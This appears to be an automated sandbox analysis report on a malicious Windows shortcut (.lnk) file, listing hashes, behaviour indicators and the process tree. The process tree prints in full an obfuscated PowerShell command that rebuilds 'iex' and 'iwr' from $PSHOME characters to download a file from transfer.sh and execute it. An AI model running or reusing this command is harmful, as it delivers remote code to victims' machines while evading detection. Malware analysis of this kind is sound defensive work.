4f1efc63df5946883d53bf8022ef3cca714cfc210aa71938b2ef349b00115523

Analysis

max time kernel
30s
max time network
34s
platform
windows7_x64
resource
win7-20230705-en
resource tags

arch:x64arch:x86image:win7-20230705-enlocale:en-usos:windows7-x64system
submitted
06-07-2023 01:50

Target

75c4cc9c8303c2919aee6e42b8a067e9f46522913cf5755dc66a29c0c5f4a1e6.lnk
Size

1KB
MD5

88cda338f875b4e478ca353b9b7f1d09
SHA1

c79f03518ac3e57e947e5dc07c1e99c76c67b4f8
SHA256

75c4cc9c8303c2919aee6e42b8a067e9f46522913cf5755dc66a29c0c5f4a1e6
SHA512

e3fff3083fbc1b27601183de25f0a7b94b8feae2a955e1ddcb15f67e5dd80120210663feb66b8e1dcc962991bd54541fd078b8365d453742cd3c6ec8775b93f1

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2760	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 2760	2872	cmd.exe	28
PID 2872 wrote to memory of 2760	2872	cmd.exe	28
PID 2872 wrote to memory of 2760	2872	cmd.exe	28

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\75c4cc9c8303c2919aee6e42b8a067e9f46522913cf5755dc66a29c0c5f4a1e6.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${.*} = $PSHOME[+22 -24 +2] + $PSHOME[-12 +3] + 'a' + $PSHOME[-66 +55];${g^4} = $([TYPE]${.*});${.**} = ${g^4}::ToString(+79 -1 -5);${.**..} = ${g^4}::ToString(+79 -1 -5 -4);${..***} = ${g^4}::ToString(+79 +30 -10 +21);&(${.**} +${.**..} + ${..***})(&(${.**} +${.**..} + ${..***})($PSHOME[+52 -53 +1]+'u'+$PSHOME[-66 +55]+$PSHOME[-61 +55]+' https://transfer.sh/get/FRcrqrPgy2/fa3333.txt -UseBasicParsing')).Content
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2760

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2760-92-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2760-93-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2760-94-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/2760-95-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/2760-96-0x00000000024D4000-0x00000000024D7000-memory.dmp

Filesize
12KB

Download
memory/2760-97-0x00000000024DB000-0x0000000002512000-memory.dmp

Filesize
220KB

Download